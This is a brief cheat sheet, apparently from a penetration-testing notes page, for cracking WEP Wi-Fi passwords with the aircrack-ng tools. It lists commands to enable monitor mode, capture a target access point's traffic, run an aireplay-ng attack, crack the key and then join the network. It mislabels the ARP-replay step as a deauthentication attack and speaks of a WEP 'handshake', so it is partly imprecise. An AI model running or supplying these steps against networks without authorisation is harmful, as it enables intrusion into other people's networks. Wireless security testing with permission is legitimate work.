Attack WEP
Ref:
Start Monitor mode:
# start monitor mode
sudo airmon-ng start wlan0
# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0
# filter wps encryption
sudo airodump-ng wlan0mon --wps
Start capture hash of the handshake:
sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0
In parallel run deauthentication attack:
sudo aireplay-ng -3 -b $NAME_OF_SSID -h $STATION_MAC wlan0
crack the handshake
sudo aircrack-ng capture_WEP.cap
After cracking, you can directly connect the WiFi by the UI or terminal below:
sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>
# refresh the DHCP Configuration
sudo dhclient wlan0
Stuck?
--> https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture
Last updated